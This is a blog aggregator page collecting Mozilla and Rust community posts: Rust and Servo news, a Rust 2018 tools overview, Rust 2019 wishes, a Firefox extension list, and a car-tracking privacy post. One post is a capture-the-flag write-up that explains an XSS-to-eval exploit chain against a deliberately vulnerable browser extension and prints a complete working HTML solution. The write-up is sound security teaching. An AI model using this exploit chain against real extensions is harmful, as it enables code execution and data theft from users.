Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

247 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in final comment period.

Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

impl Drop for Mic {}

– Nick Fitzgerald rapping about Rust

Thanks to mark-i-m for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Wladimir PalantBBN challenge resolution: Getting the flag from a browser extension

My so far last BugBountyNotes challenge is called Can you get the flag from this browser extension?. Unlike the previous one, this isn’t about exploiting logical errors but the more straightforward Remote Code Execution. The goal is running your code in the context of the extension’s background page in order to extract the flag variable stored there.

If you haven’t looked at this challenge yet, feel free to stop reading at this point and go try it out. Mind you, this one is hard and only two people managed to solve it so far. Note also that I won’t look at any answers submitted at this point any more. Of course, you can also participate in any of the ongoing challenges as well.

Still here? Ok, I’m going to explain this challenge then.

The obvious vulnerability

This browser extension is a minimalist password manager: it doesn’t bother storing passwords, only login names. And the vulnerability is of a very common type: when generating HTML code, this extension forgets to escape HTML entities in the logins:

      for (let login of logins)
        html += `<li><a href="#" data-value="${login}">${login}</a></li>`;

Since the website can fill out and submit a form programmatically, it can make this extension remember whichever login it wants. Making the extension store something like login<img src=x onerror=alert(1)> will result in JavaScript code executing whenever the user opens the website in future. Trouble is: the code executes in the context of the same website that injected this code in the first place, so nothing is gained by that.

Getting into the content script

What you’d really want is having your script run within the content script of the extension. There is an interesting fact: if you call eval() in a content script, code will be evaluated in the context of the content script rather than website context. This happens even if the extension’s content security policy forbids eval: content security policy only applies to extension pages, not to its content scripts. Why the browser vendors don’t tighten security here is beyond me.

And now comes something very non-obvious. The HTML code is being inserted using the following:

$container = $(html);
$login.parent().prepend($container);

One would think that jQuery uses innerHTML or its moral equivalent here but that’s not actually true. innerHTML won’t execute JavaScript code within <script> tags, so jQuery is being “helpful” and executing that code separately. Newer jQuery versions will add a <script> tag to the DOM temporarily but the versions before jQuery 2.1.2 will essentially call eval(). Bingo!

So your payload has to be something like login<script>alert(1)</script>, this way your code will run in the context of the content script.

Getting from the content script to the background page

The content script can only communicate with the background page via messaging. And the background page only supports two commands: getLogins and addLogin. Neither will allow you to extract the flag or inject code.

But the way the background page translates message types into handlers is remarkable:

window[message.type].apply(window, message.params)

If you look closely, you are not restricted by the handler functions defined in the background page, any global JavaScript function will do! And there is one particularly useful function called eval(). So your message has to look like this to extract the flag: {type: 'eval', params: ['console.log(FLAG)']}. There you go, you have code running in the background page that can extract the flag or do just about anything.

The complete solution

So here is my complete solution. As usually, this is only one way of doing it.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Safe Login Storage solution</title>
    <script>
      window.addEventListener("load", event =>
      {
        window.setTimeout(() =>
        {
          let container = document.getElementById("logins-container");
          if (!container || !container.querySelector("[data-value^='boom']"))
          {
            document.getElementById("username").value = "boom<script>chrome.runtime.sendMessage({type: 'eval', params: ['console.log(FLAG)']})<\/script>";
            document.getElementById("submit").click();
            window.location.reload();
          }
        }, 2000);
      });
    </script>
  </head>
  <body>
    <form action="javascript:void(0)" hidden>
      <input id="username">
      <input id="submit" type="submit">
    </form>
  </body>
</html>

Don MartiFirefox extensions list 2018

One of the great things about Firefox is the ability to customize with extensions.A MIG-15 can climb and turn faster than an F-86. A MIG-15 is more heavily armed. But in actual dogfights the F-86 won 9 out of 10 times. Part of that is training, but part is that the Soviets used data to build for the average pilot, while the USA did a bigger study of pilots' measurements and recognized that adjustable seats and controls were necessary. Even in a group of pilots of average overall size, nobody was in the average range on all their measurements. Here is what I'm running right now.

  • Awesome RSS. Get the RSS button back. Works great with RSS Preview.

  • blind-reviews. This is an experiment to help break your own habits of bias when reviewing code contributions. It hides the contributor name and email when you first see the code, and you can reveal it later.

  • Cookie AutoDelete. Similar to the old "Self-Destructing Cookies". Cleans up cookies after leaving a site. Useful but requires me to whitelist the sites where I want to stay logged in. More time-consuming than other privacy tools. This is a good safety measure that helps protect me while I'm trying out new the new privacy settings in Firefox Nightly as my main data protection tool.

  • Copy as Markdown. Not quite as full-featured as the old "Copy as HTML Link" but still a time-saver for blogging. Copy both the page title and URL, formatted as Markdown, for pasting into a blog.

  • Facebook Container because, well, Facebook.

  • Facebook Political Ad Collector, even though I don't visit Facebook very often. This one reports sneaky Facebook ads to ProPublica.

  • Global Consent Manager, which provides an improved consent experience for European sites. More info coming soon.

  • HTTPS Everywhere. This is pretty basic. Use the encrypted version of a site where available.

  • Link Cleaner. Get rid of crappy tracking parameters in URLs, and speed up some navigation by skipping data collection redirects.

  • NJS. Minimal JavaScript disable/enable button that remembers the setting by site and defaults to "on". Most sites that use JavaScript for real applications are fine, but this is for handling sites that cut and pasted a "Promote your newsletter to people who haven't even read your blog yet" script from some "growth hacking" article.

  • Personal Blocklist is surprisingly handy for removing domains that are heavy on SEO but weak on actual information from search results. (the Ministry of Central Planning at Google is building the perfectly-measured MIG cockpit, while extension developers make stuff adjustable.)

  • RSS Preview. The other missing piece of the RSS experience. The upside to the unpopularity of RSS is that so many sites just leave the full-text RSS feeds, that came with their CMS, turned on.

Bonus links

'Artifact' Isn't a Game on Steam, It's Steam in a Game - Waypoint

Does It Matter Where You Go to College?

The Golden Age of Rich People Not Paying Their Taxes

Liberating Birds For A Cheap Electric Scooter

America’s Power Grid Isn’t Ready for Electric Cars

The Servo BlogThis Week In Servo 121

In the past two weeks, we merged 113 PRs in the Servo organization’s repositories.

There are some interesting ideas being considered about how to improve GC safety in Servo.

Planning and Status

Our roadmap is available online, including the overall plans for 2018.

This week’s status updates are here.

Exciting works in progress

  • mandreyel is adding support for parallel CSS parsing.
  • SimonSapin is slowly but surely converting buildbot CI jobs to run on Taskcluster.
  • paulrouget is converting the simpleservo crate into an API to embed Servo on new platforms without worrying about the details.
  • jdm is fixing the longstanding bug preventing iframes from knowing their own sizes on creation.
  • oOIgnitionOo is making it easier to find regression ranges in Servo nightlies.
  • cbrewster is adding profiling support for WebGL APIs.
  • jdm is synchronizing WebGL rendering with WebRender’s GL requirements.
  • paulrouget is separating the compositor from the rest of the browser to support more complex windowing requirements.

Notable Additions

  • dlrobertson documented the ipc-channel crate.
  • lucasfantacuci added support for changing the volume of media elements.
  • ferjm removed a race in the media playback initialization.
  • SimonSapin converted the buildbot job that publishes Servo’s documentation to run on Taskcluster.
  • cdeler added support for bootstrapping a Servo build on Linux Mint.
  • jdm made CSS animations expire if the animating node no longer participates in layout.
  • SimonSapin wrote a lot of documentation for the new Taskcluster/Treeherder integration.
  • nox implemented support for non-UTF8 Content-Type charset values for documents.

New Contributors

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

The Rust Programming Language BlogTools in the 2018 edition

Tooling is an important part of what makes a programming language practical and productive. Rust has always had some great tools (Cargo in particular has a well-deserved reputation as a best-in-class package manager and build tool), and the 2018 edition includes more tools which we hope further improve Rust users' experience.

In this blog post I'll cover Clippy and Rustfmt – two tools that have been around for a few years and are now stable and ready for general use. I'll also cover IDE support – a key workflow for many users which is now much better supported. I'll start by talking about Rustfix, a new tool which was central to our edition migration plans.

Rustfix

Rustfix is a tool for automatically making changes to Rust code. It is a key part of our migration story for the 2018 edition, making the transition from 2015 to 2018 editions much easier, and in many cases completely automatic. This is essential, since without such a tool we'd be much more limited in the kinds of breaking changes users would accept.

A simple example:

trait Foo {
    fn foo(&self, i32);
}

The above is legal in Rust 2015, but not in Rust 2018 (method arguments must be made explicit). Rustfix changes the above code to:

trait Foo {
    fn foo(&self, _: i32);
}

For detailed information on how to use Rustfix, see these instructions. To transition your code from the 2015 to 2018 edition, run cargo fix --edition.

Rustfix can do a lot, but it is not perfect. When it can't fix your code, it will emit a warning informing you that you need to fix it manually. We're continuing to work to improve things.

Rustfix works by automatically applying suggestions from the compiler. When we add or improve the compiler's suggestion for fixing an error or warning, then that improves Rustfix. We use the same information in an IDE to give quick fixes (such as automatically adding imports).

Thank you to Pascal Hertleif (killercup), Oliver Scherer (oli-obk), Alex Crichton, Zack Davis, and Eric Huss for developing Rustfix and the compiler lints which it uses.

Clippy

Clippy is a linter for Rust. It has numerous (currently 290!) lints to help improve the correctness, performance and style of your programs. Each lint can be turned on or off (allow), and configured as either an error (deny) or warning (warn).

An example: the iter_next_loop lint checks that you haven't made an error by iterating on the result of next rather than the object you're calling next on (this is an easy mistake to make when changing a while let loop to a for loop).

for x in y.next() {
    // ...
}

will give the error

error: you are iterating over `Iterator::next()` which is an Option; this will compile but is probably not what you want
 --> src/main.rs:4:14
  |
4 |     for x in y.next() {
  |              ^^^^^^^^
  |
  = note: #[deny(clippy::iter_next_loop)] on by default
  = help: for further information visit https://rust-lang.github.io/rust-clippy/master/index.html#iter_next_loop

Clippy works by extending the Rust compiler. The compiler has support for a few built-in lints, Clippy uses the same mechanisms but with lots more lints. That means Clippy's error/warning format should be familiar, you should be able to apply Clippy's suggestions in your IDE (or using Rustfix), and that the lints are reliable and accurate.

With Rust 1.31 and the 2018 edition, Clippy is available on stable Rust and has backwards compatibility guarantees (if it had a version number, it would be 1.0). Clippy has the same stability guarantees as rustc: new lints may be added, and lints may be modified to add more functionality, however lints may never be removed (only deprecated). This means that code that compiles with Clippy will continue to compile with Clippy (provided there are no lints set to error via deny), but may throw new warnings.

Clippy can be installed using rustup component add clippy, then use it with cargo clippy. For more information, including how to run it in your CI, see the repo readme.

Thank you Clippy team (Pascal Hertleif (killercup), Oliver Scherer (oli-obk), Manish Goregaokar (manishearth), and Andre Bogus (llogiq))!

Rustfmt

Rustfmt is a tool for formatting your source code. It takes arbitrary, messy code and turns it into neat, beautifully styled code.

Automatically formatting saves you time and mental energy. You don't need to worry about style as you code. If you use Rustfmt in your CI (cargo fmt --check), then you don't need to worry about code style in review. By using a standard style you make your project feel more familiar for new contributors and spare yourself arguments about code style. Rust's standard code style is the Rustfmt default, but if you must, then you can customize Rustfmt extensively.

Rustfmt 1.0 is part of the 2018 edition release. It should work on all code and will be backwards compatible until the 2.0 release. By backwards compatible we mean that if your code is formatted (i.e., excluding bugs which prevent any formatting or code which does not compile), it will always be formatted in the same way. This guarantee only applies if you use the default formatting options.

Rustfmt is not done. Formatting is not perfect, in particular we don't touch comments and string literals and we are pretty limited with macro definitions and some macro uses. We're likely to improve formatting here, but you will need to opt-in to these changes until there is a 2.0 release. We are planning on having a 2.0 release. Unlike Rust itself, we think its a good idea to have a breaking release of Rustfmt and expect that to happen some time in late 2019.

To install Rustfmt, use rustup component add rustfmt. To format your project, use cargo fmt. You can also format individual files using rustfmt (though note that by default rustfmt will format nested modules). You can also use Rustfmt in your editor or IDE using the RLS (see below; no need to install rustfmt for this, it comes as part of the RLS). We recommend configuring your editor to run rustfmt on save. Not having to think about formatting at all as you type is a pleasant change.

Thank you Seiichi Uchida (topecongiro), Marcus Klaas, and all the Rustfmt contributors!

IDE support

For many users, their IDE is the most important tool. Rust IDE support has been in the works for a while and is a highly demanded feature. Rust is now supported in many IDEs and editors: IntelliJ, Visual Studio Code, Atom, Sublime Text, Eclipse (and more...). Follow each link for installation instructions.

Editor support is powered in two different ways: IntelliJ uses its own compiler, the other editors use the Rust compiler via the Rust Language Server (RLS). Both approaches give a good but imperfect IDE experience. You should probably choose based on which editor you prefer (although if your project does not use Cargo, then you won't be able to use the RLS).

All these editors come with support for standard IDE functions including 'go to definition', 'find all references', code completion, renaming, and reformatting.

The RLS has been developed by the Rust dev tools team, it is a bid to bring Rust support to as many IDEs and editors as possible. It directly uses Cargo and the Rust compiler to provide accurate information about a program. Due to performance constraints, code completion is not yet powered by the compiler and therefore can be a bit more hit and miss than other features.

Thanks to the IDEs and editors team for work on the RLS and the various IDEs and extensions (alexheretic, autozimu, jasonwilliams, LucasBullen, matklad, vlad20012, Xanewok), Jonathan Turner for helping start off the RLS, and phildawes, kngwyu, jwilm, and the other Racer contributors for their work on Racer (the code completion component of the RLS)!

The future

We're not done yet! There's lots more we think we can do in the tools domain over the next year or so.

We've been improving rust debugging support in LLDB and GDB and there is more in the works. We're experimenting with distributing our own versions with Rustup and making debugging from your IDE easier and more powerful.

We hope to make the RLS faster, more stable, and more accurate; including using the compiler for code completion.

We want to make Cargo a lot more powerful: Cargo will handle compiled binaries as well as source code, which will make building and installing crates faster. We will support better integration with other build systems (which in turn will enable using the RLS with more projects). We'll add commands for adding and upgrading dependencies, and to help with security audits.

Rustdoc will see improvements to its source view (powered by the RLS) and links between documentation for different crates.

There's always lots of interesting things to work on. If you'd like to help chat to us on GitHub or Discord.

Henri SivonenRust 2019

The Rust team encouraged people to write blog posts reflecting on Rust in 2018 and proposing goals and directions for 2019. Here’s mine.

This is knowingly blatantly focused on the niche that is immediately relevant to my work. I don’t even pretend this to represent any kind of overall big picture.

Rust in 2018

In my Rust 2018 post, I had these items:

  • simd-Style SIMD
  • Rust bool in FFI is C _Bool
  • Debug Info for Code Expanded from Macros
  • Non-Nightly Benchmarking
  • GUI for rr replay
  • Tool for Understanding What LLVM Did with a Given Function

As far as I know, the kind of tool I wanted for understading what LLVM did does not exist in a way that does not involve extracting a minimized case with the dependencies for copying and pasting to rust.godbolt.org. After one goes through the effort of making a Compiler Explorer-compatible extract, the tool is great, though. I don’t know if the feature existed a year ago, but Compiler Explorer now has tooltips that explain what assembly instructions do, so I’d rate this old wish half fulfilled. (Got the asm explanations but didn’t get to avoid manually extracting the code under scrutiny.)

I’ve been told that GUIs for rr exist and work. However, I got stuck with cgdb (launch with rr replay --debugger=/usr/bin/cgdb --no-redirect-output; thanks to Thomas McGuire and David Faure of KDAB for that incantation), because it has worked well for me, and the Python+browser front end that was recommended to me did not work right away. (I should try again.)

Also, Rust bool is now documented to have size_of 1 and the proposal to make the compiler complain about bool in FFI has been abandoned. 🎉

Cool Things in 2018 That I Did Not Ask For

Looking back at 2018 beyond what I wrote in my Rust 2018 post, I am particularly happy about these features making it to non-nightly Rust:

Non-lexical lifetimes is a huge boost for the ergonomics of the language. I hope the people who previously turned away from Rust due to the borrow checker will be willing to try again.

align_to makes it easier to write more obviously correct optimizations that look at byte buffers one register at a time. A bit disappointly, the previous sentence cannot say “safe code”, because align_to is still unsafe. It would be nice if there was a safe version with a trait bound on the types requiring types whose all bit patterns are defined and then having primitive integers and SIMD vectors with primitive integer lane types implement the relevant marker trait. (I.e. exposing endianness would be considered safe like integer overflow is considered safe.)

I expect chunks_exact to be relevant to writing safe SIMD code.

Carry-Overs from 2018

Some items from a year ago are not done.

Non-Nightly Benchmarking

The library support for the cargo bench feature has been in the state “basically, the design is problematic, but we haven’t had anyone work through those issues yet” since 2015. It’s a useful feature nonetheless. Like I said a year ago, it’s time to let go of the possibility of tweaking it for elegance and just let users use it on non-nighly Rust.

Debug Info for Code Expanded from Macros

No news on this RFC.

Portable SIMD

A lot of work has been done on this topic in the past year, which is great. Thank you! Instead of the design of the simd crate, the design and implementation is proceeding in the packed_simd crate. I wish that packed_simd with its into_bits feature enabled becomes code::simd / std::simd and available on non-nightly Rust in 2019.

A year ago I wished that core::arch / std::arch did not become available on non-nightly Rust before core::simd / std::simd out of concern that vendor-specific SIMD shipping before portable SIMD would unnecessarily skew the ecosystem towards the incumbent (Intel). I think it is too early to assess if the concern was valid.

New Items

In addition to reiterating the old items, I do have some new ones, too.

Compiling the Standard Library with User Settings

At present, when you compile a Rust artifact, your own code and the crates your code depends on get compiled, but the standard library is taken as a pre-compiled library. This is problematic especially with SIMD functionality moving to the standard library.

32-bit CPU architectures like x86, ARM, PowerPC and MIPS introduced SIMD during the evolution of the instruction set architecture. Therefore, unlike in the case of x86_64, aarch64 and little-endian POWER, generic 32-bit targets cannot assume that SIMD support is present. If you as an application developer decide to scope your application to support only recent enough 32-bit CPUs that you can assume SSE2/NEON/AltiVec/MSA to be present and want to use packed_simd / std::simd to use the SIMD capability of the CPU, you are going to have a bad time if the Rust standard library has been compiled with the assumption that the SIMD unit does not exist.

For 32-bit x86 and SSE2 Rust solves this by providing two targets: i586 without SSE2 and i686 with SSE2. Currently, the ARMv7 (both Thumb2 and non-Thumb2) targets are without NEON. I am hoping to introduce Thumb2+NEON variants in 2019.

Adding targets won’t scale, though. For example, even in the x86_64 case you might determine that it is OK for you application to require a CPU that supports SSSE3, which is relevant to portable SIMD by providing arbitrary shuffling as a single instruction. (At present, the SSE2 shuffle generation back end for LLVM misses even some seemingly obvious cases like transposing each of the eight pairs of lanes in u8x16 by lane-wise shifting by 8 to both directions in an u16x8 interpretation and bitwise ORing the results.)

I hope that in 2019, Cargo gains the Xargo functionality of being able to compile the standard library with the same target feature settings that are used for compiling the user code and the crate dependencies.

Better Integer Range Analysis for Bound Check Elision

Currently, LLVM only elides the bound checks when indexing into slices if you’ve made the most obvious comparison previously between the index and the slice length. For example:

if i < slice.len() {
    slice[i] // bound check elided
}

Pretty much anything more complex results in a bound check branch, and the performance effect is measurable when it happens in the innermost loop. I hope that rustc and LLVM will do better in 2019. Specifically:

  • LLVM should become able to eliminate the second check in code like:

    if a + C < b {
        if a + D < b {
        	// ...
        }
    }

    …if a, b, C, and D are all of type usize, a and b are run-time variables, C and D are compile-time constants such that D <= C and a + C can be proven at compile time not to overflow.

  • LLVM should become able to figure out that a + C didn’t overflow if it was written as a.checked_add(C).unwrap() and execution continued to the second check.

  • rustc should become able to tell LLVM that a small constant added to slice.len() or a value previously checked to be less than slice.len() does not overflow by telling LLVM to assume that the maximum possible value for a slice length is quite a bit less than usize::max_value().

    Since a slice has to represent a possible allocation, the maximum possible value for len() is not usize::max_value(). On 64-bit platforms, rustc should tell LLVM that the usize returned by len() is capped by the number of bits the architecture actually uses for the virtual address space, which is lower than 64 bits. I’m not sure if Rust considers it permissible for 32-bit PAE processes allocate more than half the address space in a single allocation (it seems like a bad thing to allow in terms of pointer difference computations, but it looks like glibc has at least it the past allowed such allocations), but even if it considered permissible, it should be possible to come up with a slice size limit by observing that a slice cannot fill the whole address space, because at least the stack size and the size of the code for a minimal program have to be reserved.

  • LLVM should become able to figure out that if a: ufoo and a >= C, then a - C < ufoo::max_size() + 1 - C and, therefore, indexing with a - C into an array whose length is ufoo::max_size() + 1 - C does not need a bound check. (Where C is a compile-time constant.)

likely() and unlikely() for Plain if Branch Prediction Hints

The issue for likely() and unlikely() has stalled on the observation that they don’t generalize for if let, match, etc. They would work for plain if, though. Let’s have them for plain if in 2019 even if if let, match, etc., remain unaddressed for now.

No LTS

Rust has successfully delivered on “stability without stagnation” to the point that Red Hat has announced Rust updates for RHEL on a 3-month frequency instead of Rust getting stuck for the duration of the lifecycle of a RHEL version. That is, contrary to popular belief, the “stability” part works without an LTS. At this point, doing an LTS would be a stategic blunder that would jeopardize the “without stagnation” part.

Andy McKayCar Tracking

This week I recieved and email from the Clean Energy Vehicle program. They'd like us to install a device in our Tesla that tracks us:

"By understanding when and where EVs charge to how much energy is consumed, you can help pave the way for future drivers by ensuring that the power system is ready for a plug-in future."

The program details are here.

"GPS information is collected, but not shared at the individual level. The data is collected and stored but no one outside of FleetCarma will see an individual’s location data."

Alright so who's FleetCarma? Let's look into the terms:

"Data Collected by the C2 Device and Privacy... drive start date and time, duration of trip, trip distance... GPS coordinates of the drive,"

"With the specific exclusion of GPS coordinates when driving, an anonymized subset of the data outlined above may be shared with the Province and BC Hydro and other third party suppliers"

"GPS coordinates during driving will not be shared with any Program partners or third party suppliers except in both anonymous and aggregate form to inhibit extraction of any individual driving behaviour."

Not sure who those Program partners or third party suppliers are but GeoTab uses some sub-processors.

FletCarma will share your information:

"To affiliated entities of CrossChasm Technologies Inc., including wholly owned subsidiaries" (Whomever that is)

"When we’re legally required to provide data, such as in response to a subpoena in a civil lawsuit."

It's nice to note.

"You may also request that your Personal Information be deleted. FleetCarma will promptly respond to your request within 30 days"

At this point I can surmise that:

  • FleetCarma will know all the trips I make in the car.

  • FleetCarma be subpoenad to give up that information.

  • FleetCarma can be hacked to give up all that information.

Normally this would be a simple, hell no. But I care greatly about electric cars and the infrastructure and this has put me in a bind. The privacy problem here is one that I simply can't get around.